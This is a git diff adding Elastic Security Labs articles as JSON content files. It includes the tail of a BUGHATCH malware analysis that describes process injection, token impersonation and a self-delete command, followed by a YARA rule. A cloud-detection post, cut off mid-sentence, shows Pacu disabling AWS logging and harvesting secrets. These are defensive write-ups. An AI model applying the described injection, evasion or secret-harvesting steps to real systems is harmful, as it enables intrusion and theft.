malware allocates a large memory block to write shellcode and a XOR encrypted PE file.\n\nThe shellcode will 2-byte XOR decrypt and load the embedded PE similar to ( **Command 3** ). This command can load 64bit and 32bit binaries, each architecture has its own shellcode PE loader, after injecting the shellcode it will point the instruction pointer of the child process’s thread to the shellcode and resume the thread.\n\n\n\nThe following is an example of a packet captured from our custom emulated C2 server, we can see the structure discussed earlier on the left side and the packet bytes on the right side, for each command implemented in the malware, a packet example will be given.\n\n\n\n#### DropPEDiskExecute\n\nWith this subcommand, the operator can drop a PE file on disk and execute it. The agent has 3 different implementations depending on the PE file type, GUI Application, CUI (Console Application), or a DLL.\n\nFor CUI binaries, the malware first generates a random path in the temporary folder and writes the PE file to it using **CreateFileA** and **WriteFile** API.\n\n\n\nIt then creates a process of the dropped binary file as a child process by redirecting its standard input and output handles; after execution of the payload the output is sent to the operator’s C2 server.\n\nFor GUI PE binaries, the agent simply writes it to disk and executes it directly with **CreateProcessA** API.\n\nAnd lastly, for DLL PE files, the malware first writes the DLL to a randomly generated path in the temporary folder, then uses **c:\\windows\\system32\\rundll32.exe** or **c:\\windows\\syswow64\\rundll32.exe** (depending on the architecture of the DLL) to run either an exported function specified by the operator or the function **start** if no export functions were specified.\n\n\n\n\n\n#### SelfShellcodeExecute\n\nThis subcommand tasks the agent to execute shellcode in its own memory space by allocating a memory region using **VirtualAlloc** API and then copying the shellcode to it, the shellcode is executed by creating a thread using **CreateThread** API.\n\n\n\n\n\n#### RemoteShellcodeExecute\n\nThis sub-command can be used to execute a 32-bit or a 64-bit position independent shellcode in another process memory space.\n\nSimilarly to the **SpawnAgent** subcommand, the malware creates a suspended **svchost.exe** process with **CreateProcessA** API, allocates a memory region for the shellcode sent by the C2 server with **VirtualAllocEx** , and writes to it with **WriteProcessMemory** , it then sets the suspended thread instruction pointer to point to the injected shellcode with **SetThreadContext** and finally it will resume the thread with **ResumeThread** to execute the payload.\n\n\n\n\n\n\n\n#### ExecuteCmd and ExecutePowershell\n\nAn operator can execute PowerShell scripts or CMD scripts in the infected machine, the malware can either write the script to a file in the temporary folder with a randomly generated name as follow: **`TEMP.PS1`** for PowerShell or **`TEMP.CMD`** for a Command shell. The malware then passes parameters to it if specified by the malicious actor and executes it, the malware uses named pipes to retrieve the output of the PowerShell process.\n\n\n\n\n\n#### ReflectivelyLoadDllRemote\n\nExecute reflectively a 32-bit or 64-bit DLL in a process created in a suspended state, the following summarizes the execution flow:\n\n- Check if the PE file is a 32 or 64-bit DLL\n- Create a suspended **svchost.exe** process\n- Allocate memory for the DLL and the parameter for the DLL if specified by the C2 command with the **VirtualAllocEx** API\n- Write to the remotely allocated memory withthe **WriteProcessMemory** API the DLL and the parameter if specified\n- Create a remote thread to execute the injected DLL with the **CreateRemoteThread** API\n\n\n\n\n\n### Command 2\n\nThe command 2 has multiple sub functionalities as shown in the command table above, according to a subCommandFlag the malware can do 6 different operations as follows:\n\n| | | |\n| ---------------- | --------------------- | ---------------------------- |\n| Sub Command Flag | Function Name | Functionality description |\n| 1 | ExitProcess | Exit process |\n| 2 | SelfDeleteExitProcess | Self delete and exit process |\n| 3 | SpawnAgent64 | Spawn 64-bit agent |\n| 4 | SpawnAgent32 | Spawn 32-bit agent |\n| 0x1001 | ImpersonateToken | Impersonate explorer |\n| 0x1002 | MigrateC2 | Change C2 config |\n\nThe following is the structure that is used by the above commands:\n\n```\nstruct ImpersonateReplicateStruct\n{\n int subCommandFlag;\n int impersonateExplorerToken;\n char padding[16];\n __int16 isParameterSet;\n WCHAR w_parameters[n];\n};\n```\n\n#### ExitProcess\n\nCalls the **ExitProcess(0)** API to terminate.\n\n\n\n#### SelfDeleteExitProcess\n\nThe agent gets the PATH of the current process with **GetModuleFileNameA** and then executes the following command to self-delete: **cmd.exe /c del FILEPATH \\\\>\\\\> NUL** using **CreateProcessA** then simply exit the process with **ExitProcess(0)**.\n\n\n\n#### SpawnAgent64 and SpawnAgent32\n\nWhen subcommands 3 or 4 are specified, the malware will spawn another agent on the same machine depending on the subcommand sent by the C2, as shown in the table above.\n\nThe malware first retrieves the C2 IP address embedded in it, it will then do an HTTP GET request to download a packed agent in shellcode format, in the sample we analyzed **/Agent32.bin** URI is for the 32-bit agent, and **/Agent64.bin** is for 64-bit the agent.\n\n\n\nThe malware then creates a suspended **svchost.exe** process with **CreateProcessA** API, writes the agent shellcode to the process, sets its instruction pointer to point to the injected shellcode with **SetThreadContext** , and finally it will resume the thread with **ResumeThread** to execute the injected payload.\n\n\n\n#### ImpersonateToken\n\nThis subcommand is specific to process tokens; an attacker can either impersonate the **explorer.exe** token or create a token from credentials (Domain\\Username, Password) sent by the C2 to spawn another instance of the current process.\n\n\n\nIt will first check if the current process is a local system account or local service account or network service account by testing whether the given process token is a member of the group with the specified RID ( **SECURITY_LOCAL_SYSTEM_RID** , **SECURITY_LOCAL_SERVICE_RID** , **SECURITY_NETWORK_SERVICE_RID** ) respectively.\n\n\n\nThen depending if the operator specified credentials or not, the malware will first call **LogonUserW** with the Domain\\User and password to create a token then it will spawn another instance of the current process with this token.\n\n\n\nIf not, the implant will impersonate the **explore.exe** process by duplicating its token with **DuplicateTokenEx** and then spawn the current process with the duplicated token if no credentials are specified.\n\n\n\n#### MigrateC2\n\nThe operator can migrate the implant to another C2 server by specifying the subcommand **0x1001** with the IP address of the new C2.\n\n\n\n\n\n### Command 3\n\nWhen command 3 is received the malware will reflectively load a PE file embedded as payload in the C&C request in another process's memory space, the following is an overview of the execution:\n\n- Determine the type and architecture of the PE file\n- Create a suspended process\n- Allocate a large memory in the suspended process\n- Write a shellcode in the allocated memory that will locate, decrypt and reflectively load the PE file\n- 2-byte XOR encrypt the PE file and append it after the shellcode\n- Set the EIP context of the suspended process to execute the shellcode\n\nThe shellcode will then reflectively load the PE file\n\n\n\nThe agent first parses the PE file received from the C2 server to determine the type and architecture of the PE file.\n\n\n\nAnd according to this information, a Windows signed executable will be chosen to inject into.\n\nIf the PE file is CUI (Console User Interface), the malware will choose **cmd.exe** , however, if it is GUI (Graphical User Interface) or a DLL PE file it will choose **svchost.exe**.\n\n\n\nThe malware will then create a suspended process with **CreateProcessA** API (either **cmd.exe** or **svchost.exe** ) and allocate a large amount of memory with **VirtualAllocEx** in the created process, it will then copy a position independent shellcode stored in the **.rdata** section to the newly allocated memory that is responsible for locating according to a specific tag the appended PE file, decrypt it and reflectively load it in memory.\n\nThen it appends after the shellcode a 12 bytes structure composed of a tag, the size of the PE file, and a 2-byte XOR key.\n\nIt will then 2-byte XOR encrypt the PE file and append it after the structure, the following is an overview of the written data to the allocated memory:\n\n| | | | | |\n| --------- | --- | ------- | -------------- | ---------------------------- |\n| SHELLCODE | TAG | PE SIZE | 2-byte XOR KEY | 2-byte XOR encrypted PE file |\n\n\n\nThe agent will then set the thread context with **SetThreadContext** and point the instruction pointer of the suspended process to the shellcode then it will simply resume the execution with **ResumeThread**.\n\nThe shellcode will first locate the 2-byte XOR encrypted PE file according to the tag value ( **0x80706050** ), it will then 2-byte XOR decrypt it and load it reflectively on the same process memory.\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and Control](https://attack.mitre.org/tactics/TA0011)\n- [Exfiltration](https://attack.mitre.org/tactics/TA0010)\n\n### Techniques / sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n- [Encrypted Channel: Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002/)\n- [Encrypted Channel: Symmetric Cryptography](https://attack.mitre.org/techniques/T1573/001/)\n- [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n- [Automated Collection](https://attack.mitre.org/techniques/T1119/)\n- [Native API](https://attack.mitre.org/techniques/T1106/)\n\n## Detections\n\n### Detection rules\n\nThe following detection rule was observed during the analysis of the BUGHATCH sample. This rule is not exclusive to BUGHATCH activity.\n\n- [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html#enumeration-of-privileged-local-groups-membership)\n\n### YARA rule\n\nElastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to identify this activity.\n\n```\nrule Windows_Trojan_BUGHATCH {\n meta:\n author = “Elastic Security”\n creation_date = \"2022-05-09\"\n last_modified = \"2022-06-09\"\n license = “Elastic License v2”\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BUGHATCH\"\n threat_name = \"Windows.Trojan.BUGHATCH\"\n reference_sample = \"b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f\"\n\n strings:\n $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }\n $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? }\n $a3 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }\n $c1 = \"-windowstyle hidden -executionpolicy bypass -file\"\n $c2 = \"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n $c3 = \"ReflectiveLoader\"\n $c4 = \"\\\\Sysnative\\\\\"\n $c5 = \"TEMP%u.CMD\"\n $c6 = \"TEMP%u.PS1\"\n $c7 = \"\\\\TEMP%d.%s\"\n $c8 = \"NtSetContextThread\"\n $c9 = \"NtResumeThread\"\n\n condition:\n any of ($a*) or 6 of ($c*)\n}\n```\n"
+ },
+ "title": "BUGHATCH Malware Analysis",
+ "slug": "bughatch-malware-analysis",
+ "subtitle": "Malware analysis of the BUGHATCH downloader.",
+ "date": "2022-09-09",
+ "description": "Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "libraries-edev-ops-1680x980.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "bughatch",
+ "cuba",
+ "ref9019"
+ ]
+ },
+ "id": "security_labs_content-bughatch_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json
new file mode 100644
index 00000000000..e86e325e456
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Callout example\"\nslug: \"callout-example\"\ndate: \"1883-1-1\"\ndescription: \"This is an article with callout examples.\"\nauthor:\n - slug: andrew-pease\nimage: \"../../security-labs-thumbnail.png\"\ncategory:\n - slug: reports\n---\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n"
+ },
+ "title": "Callout example",
+ "slug": "callout-example",
+ "date": "1883-1-1",
+ "description": "This is an article with callout examples.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "../../security-labs-thumbnail.png",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-callout_example-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json
new file mode 100644
index 00000000000..9cacb4e5581
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Click, Click… Boom! Automating Protections Testing with Detonate\"\nslug: \"click-click-boom-automating-protections-testing-with-detonate\"\ndate: \"2023-05-04\"\ndescription: \"To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion.\"\nauthor:\n - slug: jessica-david\n - slug: hez-carty\n - slug: sergey-polzunov\nimage: \"blog-thumb-tools-various.jpg\"\ncategory:\n - slug: tools\n - slug: security-research\n - slug: detection-science\ntags:\n - detonate\n---\n\n## Preamble\n\nImagine you are an Endpoint artifact developer. After you put in the work to ensure protection against conventional shellcode injections or ransomware innovations, how do you know it actually works before you send it out into the world?\n\nFirst, you set up your end-to-end system, which involves setting up several services, the infrastructure, network configuration, and more. Then, you run some malware; the data you collect answers questions about performance and efficacy, and may be an important research resource in the future. After you spend a day testing and gathering your results, you may want to run several hundred hashes over multiple kinds of operating systems and machine types, a daunting task if done entirely manually.\n\nTo automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion. Our goal is to have it take security researchers only a couple of clicks to test our protections against malware. (Thus: click, click… boom!)\n\nIn this series of posts, we’ll: - Introduce Detonate and why we built it - Explore how Detonate works and the technical implementation details - Describe case studies on how our teams use it at Elastic - Discuss opening our efficacy testing to the community to help the world protect their data from attack\n\nInterested in other posts on Detonate? Check out [Part 2 - Into The Weeds: How We Run Detonate](https://www.elastic.co/security-labs/into-the-weeds-how-we-run-detonate) where we break down how Detonate works and dive deeper into the technical implementation.\n\n## What is Detonate?\n\nAt a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. Detonate accepts a file hash (usually a SHA256) and performs the following actions:\n\n- Prepares all files needed for detonation, including the malicious file\n- Provisions a virtual machine (VM) instance in a sandboxed environment, with limited connectivity to the outside world\n- Waits until file execution completes; this happens when, for example, an execution result file is found or the VM instance is stopped or older than a task timeout\n- Stops the running VM instance (if necessary) and cleans up the sandboxed environment\n- Generates an event summary based on telemetry and alerts produced during detonation\n\nThe results of these detonations are made available to the team for research and development purposes. By post-processing the logs, events, and alerts collected during detonation, we can enrich them with third-party intelligence and other sources to evaluate the efficacy of new and existing Elastic Security protection features.\n\n## What does it help us with?\n\n### Measuring Efficacy\n\nTo build the best EPP on the market, we have to continuously measure the effectiveness of our product against the latest threats. Detonate is used to execute many tens of thousands of samples every month from our data feeds. Gaps in coverage are automatically identified and used to prioritize improvements to our protections.\n\n### Supporting existing protections\n\nMany of our protections have associated artifacts (such as machine learning models and rule definitions) which receive regular updates. These updates need testing to ensure we identify and remediate regressions before they end up in a user’s environment.\n\nDetonate provides a framework and suite of tools to automate the analysis involved in this testing process. By leveraging a corpus of hashes with known good and bad software, we can validate our protections before they are deployed to users.\n\n### Threat research\n\nSome of our security researchers scour the internet daily for new and emerging threats. By giving them an easy-to-use platform to test malicious software they find in the wild, we better understand how Elastic Security defends against those threats or if we need to update our protections.\n\n### Evaluating new protections\n\nIn addition to testing existing protections, new protections run the risk of adverse interactions with our existing suite of layered capabilities. A new protection may be easily tested on its own, but tests may hide unintended interactions or conflicts with existing protections. Detonate provides a way for us to customize the configuration of the Elastic Stack and individual protections to more easily find and identify such conflicts earlier in development.\n\n## What’s next?\n\nIn this publication, we introduced Detonate & what we use it for at Elastic. We discussed the benefits it provides our team when assessing the performance of our security artifacts.\n\nNow that you know what it is, we will break down how Detonate works. In our next post, we’ll dive deeper into the technical implementation of Detonate and how we’re able to create this sandboxed environment in practice.\n"
+ },
+ "title": "Click, Click… Boom! Automating Protections Testing with Detonate",
+ "slug": "click-click-boom-automating-protections-testing-with-detonate",
+ "date": "2023-05-04",
+ "description": "To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion.",
+ "author": [
+ {
+ "slug": "jessica-david"
+ },
+ {
+ "slug": "hez-carty"
+ },
+ {
+ "slug": "sergey-polzunov"
+ }
+ ],
+ "image": "blog-thumb-tools-various.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detonate"
+ ]
+ },
+ "id": "security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json
new file mode 100644
index 00000000000..b0ff29a2ddd
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json
@@ -0,0 +1,26 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Security operations: Cloud monitoring and detection with Elastic Security\"\nslug: \"cloud-monitoring-and-detection-with-elastic-security\"\ndate: \"2022-11-30\"\ndescription: \"As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post.\"\nauthor:\n - slug: brent-murphy\n - slug: david-french\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-network-attack-map.jpg\"\ncategory:\n---\n\nAs many organizations have migrated their infrastructure, applications, and data to cloud offerings, adversaries have extended their operational capabilities in cloud environments to achieve their mission — whether that means stealing intellectual property, disrupting business operations, or holding an organization's data for ransom. In order to protect our users' data from attack, the Elastic Security Intelligence & Analytics Team researches and develops [rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) to detect attacker behavior in the cloud _and_ on the endpoint.\n\nIn this post, we'll discuss cloud monitoring and detection-related challenges security operations teams face, and why attacks against cloud environments are often successful. We will share details on our free cloud detection rules (including many new ones released in [Elastic Security 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security)) and show how they can help [Elastic Security](https://www.elastic.co/security) users.\n\nWe'll also explain how Elastic can ingest logs from a wide variety of cloud platforms and how the Elastic Common Schema (ECS) makes searching, monitoring, and detection easy for defenders.\n\n## Cloud monitoring and detection challenges\n\nSecurity teams typically encounter one or more of the following challenges when they're asked to monitor, detect, and respond to threats in their organization's cloud environments:\n\n- **Resource constraints:** It can take a considerable amount of time to learn and understand cloud technologies and their ever-changing data sources. Many security operations teams do not have the resources to allocate to this ongoing effort.\n- **Understanding of adversary tradecraft:** Attacker behavior on well-known platforms such as Windows has been researched extensively and shared with the security community. Security teams may not have an in-depth understanding of how adversaries operate in cloud environments or the ability to provision a test environment to practice offensive and defensive techniques to protect their organization.\n- **Blind spots:** For effective monitoring and detection, the data available to security practitioners must be relevant, accurate, and timely. Cloud logs shipped to a SIEM can be used for detection and response as long as the security team can depend on the quality of the data.\n- **Data normalization:** Most cloud platforms have their own log categories and event schema. Normalizing logs into a common schema is not a trivial or one-off task. Some security teams, for example, have several different field names for a hostname across their data sources indexed in their SIEM. Without a normalized and documented schema, it can be difficult for analysts — especially less experienced ones — to write search queries and correlate events across data sources effectively.\n\n## Ingesting and searching cloud logs with Elastic\n\nElastic has a large collection of Filebeat [modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that can be used to simplify the collection, parsing, and visualization of many diverse log formats into a common schema — including cloud platforms such as [Amazon Web Services (AWS)](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-aws.html), [Azure](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-azure.html), [Okta](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html), and [Office 365](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-o365.html). Rapid development of new Filebeat modules is an ongoing process.\n\nThe [Elastic Common Schema](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) (ECS) defines a common set of fields for ingesting logs from a connected data source (e.g., AWS/Okta) into Elasticsearch. Log data is normalized into a format where the various field names can be used in queries to correlate behavior across data sources. This is useful to security and IT operations teams for a number of reasons.\n\nPractitioners and administrators do not need to spend countless hours transforming or normalizing their ingested logs so that the field names follow their own common schema. Managing a schema like this yourself is no small undertaking and is a continuous effort. Elastic manages ECS (saving users time and resources) so that security teams can rely on a common set of field names to search their data quickly and efficiently.\n\nEnd users can rely on using the same field names in their queries when searching across multiple data sources, which presents the following advantages:\n\n- Having a consistent schema for searching saves security analysts time and lowers the barrier to entry for new analysts. Analysts don't have to learn or remember all of the different field names and their purpose for each data source.\n- Analysts can correlate events across data sources such as endpoint, proxy, and firewall, which helps them ask questions of their data more efficiently and make sound decisions during an investigation, incident, or hunt.\n- It's easy for analysts to produce a timeline or build a visualization of the activity that occurred.\n\n## Detecting attackers operating in cloud environments\n\nThe Elastic Security Intelligence & Analytics Team's research into adversary tradecraft leads to new detection features like rules and machine learning jobs — capabilities that enable small security teams to have an outsized impact. Security features like these increase the cost of an attack for adversaries. Elastic Security users can expect to see a continued focus on increasing the cost of cloud attacks.\n\nIn the remainder of this blog post, we'll simulate attack techniques against AWS and Okta cloud environments. We'll review the alerts that are generated by the suspicious activity and how an analyst can perform initial triage and complete their investigation using Elastic Security. We will also demonstrate how analysts can add exceptions to detection rules in order to filter benign events and continue to alert on suspicious behavior.\n\n## Monitoring AWS CloudTrail logs to detect suspicious behavior\n\nAs organizations migrate to or provision new infrastructure in cloud platforms like AWS, they face the common challenges that we described earlier. Fortunately, Elastic Security has a [strong variety of AWS rules](https://github.com/elastic/detection-rules/tree/main/rules/aws), available for [free in 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security) to detect suspicious behaviors in an AWS environment.\n\nThe Filebeat [module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-aws.html) for AWS helps you easily ship CloudTrail, Simple Storage Service (S3), Elastic Load Balancing (ELB), and virtual private cloud (VPC) flow logs to Elasticsearch for monitoring and detection in Elastic Security. Let's walk through an attack and defense scenario utilizing CloudTrail data. [CloudTrail](https://aws.amazon.com/cloudtrail/) provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS software development kits (SDKs), command line tools, and other AWS services. This event history can help simplify security detection, analysis, and investigations.\n\nMany attacks against AWS start with an attacker obtaining an access key and/or the secret access key details. These keys may be harvested in a variety of ways, including through phishing, a data breach, GitHub repositories, screenshots, error messages, snapshot data, or simply poor key management practices. By obtaining these keys, an attacker can take a variety of actions against your AWS infrastructure.\n\nLet's walk through one of the many potential attack scenarios that could play out. In the following example, the adversary enumerates the trails and monitoring capabilities that have been configured for the AWS account. They follow up on this activity by disabling a trail and a configuration recorder in an attempt to evade detections and then proceed to harvest secrets.\n\n### Simulating adversary behavior in AWS\n\nIn this demonstration, we'll use [Pacu](https://github.com/RhinoSecurityLabs/pacu) to perform our attack. Pacu is a popular framework for exploiting AWS infrastructure, developed and maintained by Rhino Security Labs. Pacu is modular, similar to other exploitation frameworks like Metasploit and Koadic, and enables attackers to exploit configuration flaws within an AWS account. Attackers can use Pacu to check if the required permissions are assigned to the compromised account before attempting to execute a module. This can be helpful from an attacker's perspective to not create unnecessary noise and logs, and draw additional attention from defenders by running modules that will ultimately fail.\n\nThe attacker begins by enumerating services using the detection\\_\\_enum_services module to determine what logging and monitoring services are enabled for the AWS account.\n\n\n\nThe attacker discovered eight trails, as well as ten configuration rules, a recorder, and a delivery channel. Essentially, the enumeration script is querying certain AWS API calls to list or describe relevant information about the environment. By reviewing the [code](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/detection__enum_services/main.py) of the module, we can see the targeted APIs:\n\n```\nDescribeSubscription\nGetSubscriptionState\nDescribeTrails\nListDetectors\nDescribeConfigRules\nDescribeConfigurationRecorders\nDescribeConfigurationRecorderStatus\nDescribeDeliveryChannels\nDescribeDeliveryChannelStatus\nDescribeConfigurationAggregators\nDescribeAlarms\nDescribeFlowLogs\n```\n\nAfter the attacker determines which services are running, their next logical step may be to interrupt logging and monitoring by disabling a trail, alarm, detector, or recorder in an attempt to evade detection. To accomplish this objective, we'll use a different module called detection\\_\\_disruption to disable a trail called brentlog, and stop the configuration recorder named default.\n\n\n\nAt this point, with trail logging suspended and the configuration recorder turned off from tracking changes to resources, the attacker may want to check if there are any credentials, API keys, or tokens available in [Secrets Manager](https://aws.amazon.com/about-aws/whats-new/2018/04/introducing-aws-secrets-manager/#:~:text=AWS%20Secrets%20Manager%20is%20a,other%20secrets%20throughout%20their%20lifecycle.) and if so, collect them. In this scenario, the attacker uses the enum_secrets module and finds one secret in the directory, /sessions/brent/downloads/secrets/secrets_manager. Harvesting these secrets could help the adversary achieve lateral movement and/or privilege escalation.\n\n\n\n\n\nWe'll stop our fictitious attack scenario here, but if you're curious to learn what the attacker could do next, the following Google search will return some examples: intitle:\"AWS\" intext:(\"attack\" | \"breach\"). In the next section, we'll look at what this behavior looks like from a defender's perspective and how Elastic Security can be used to detect this behavior.\n\n### Detecting and investigating the suspicious behavior in AWS\n\nWhile monitoring the usage of the previously mentioned APIs, it can be difficult to distinguish benign activity from suspicious behavior, such as an attacker enumerating an environment. In production environments, monitoring for calls to these APIs can be noisy, as the behavior is quite common. To help find this rare and potentially suspicious behavior, and in addition to the AWS detection rules we have available, we've released [machine learning](https://github.com/elastic/detection-rules/tree/main/rules/ml) jobs in 7.9 specifically for AWS CloudTrail that help identify outliers, such as patterns of unusual activity that are hard to find using conventional detection rules.\n\nLooking at our detections page from the previous attack, we can see multiple alerts were triggered. Our free built-in detection rules identified the techniques of _suspending a trail_, _stopping a configuration recorder_, and _grabbing sensitive information from the secrets manager_. The other alerts are from the machine learning jobs of [_Unusual Country For an AWS Command_](https://www.elastic.co/guide/en/security/7.9/unusual-city-for-an-aws-command.html) and [_Unusual AWS Command for a User_](https://www.elastic.co/guide/en/security/master/unusual-aws-command-for-a-user.html) which identify a geolocation (country) that is unusual for the command or a user context that does not normally use the command.\n\n\n\nIf we pivot into one of the machine learning alerts, we can see a description of what it detected, along with a built-in investigation guide to walk an analyst through a potential workflow when analyzing an unusual CloudTrail event.\n\n\n\n\n\nLet's also take a look at the details in the Timeline view from the [_AWS Configuration Recorder Stopped_](https://www.elastic.co/guide/en/security/master/aws-configuration-recorder-stopped.html) alert. The fields I'm particularly interested in are the API call, user agent string, user identity type, request parameters, and the raw text of the entire event.\n\n\n\nBy analyzing the alert, we're able to quickly determine:\n\n| | |\n| ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Field | Description |\n| event.action | Tells us the AWS API call that was made, StopConfigurationRecorder |\n| request_parameters | Gives us the details about what was sent in the request, in our case, the configuration recorder name, default |\n| user.name | Informs us as to who made the request, pacu |\n| user_identity.type | Contains details about the type of Identity and Access Management (IAM) identity. In our case, an IAMUser. Root is another user identity type we have built in rules for. |\n| user_agent | The value of the HTTP User-Agent header. User agent strings can be easily modified, but if an account typically uses the AWS Java SDK for their API calls, and it changes, then the detection of the anomalous user agent string can be a quick win. |\n| event.original | Gives us the raw alert details |\n\n_Table 1 - Analysis of alert fields_\n\nAfter analyzing the alert, we can start to piece together the events and look at what actions the user took just before our alerts fired (and afterwards as applicable). Again, we can spot the attackers enumeration here as well.\n\n\n\nWe may also want to search our environment for specific API calls to see if they were invoked by other users or hosts, from different IPs, or at other time frames that would be suspicious in our environment.\n\n\n\nWe can also create a visualization to look for the least common API calls in our environment and pivot from there. For AWS, the API calls are in the event.action field.\n\n\n\nAs demonstrated, our free built-in rules for AWS can detect this activity as well as a number of other potential attack scenarios. We've opened up our [rules repository](https://github.com/elastic/detection-rules) and encourage you to have a look and learn how to [contribute](https://github.com/elastic/detection-rules#how-to-contribute) if interested.\n\n## Detecting suspicious behavior in Okta logs\n\n[Okta single sign-on (SSO)](https://www.okta.com/products/single-sign-on/) is a cloud solution that allows users to log into a variety of systems in their organization via a centralized process using a single user account. Informing end users that they only have to remember one username and password instead of ten or more reduces the risk that they'll adopt poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barriers to entry for attackers. Many attackers will simply move on to look for an easier target when they discover that MFA is enforced for their target's network or user account.\n\nWhile SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems that offer a type of skeleton key to many systems and applications are often an attractive target for attackers. For example, if an adversary manages to harvest an Okta administrator's credentials or API token, they could attempt to perform any of the actions in the non-exhaustive list below:\n\n- Modify or disable MFA policies for one or more applications in order to weaken their victim's security controls.\n- Create new user accounts or API tokens to maintain persistence in their target's environment and attempt to “blend in” and evade detection.\n- Modify, delete, or deactivate an Okta network zone to loosen the restrictions on which geolocation users or administrators can login from.\n- Delete or disable an application or other configuration to create a Denial-of-Service (DoS) condition and impact a company's business operations.\n\nTo enable security teams to monitor their Okta environment for suspicious activity, our [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) can pull [Okta System 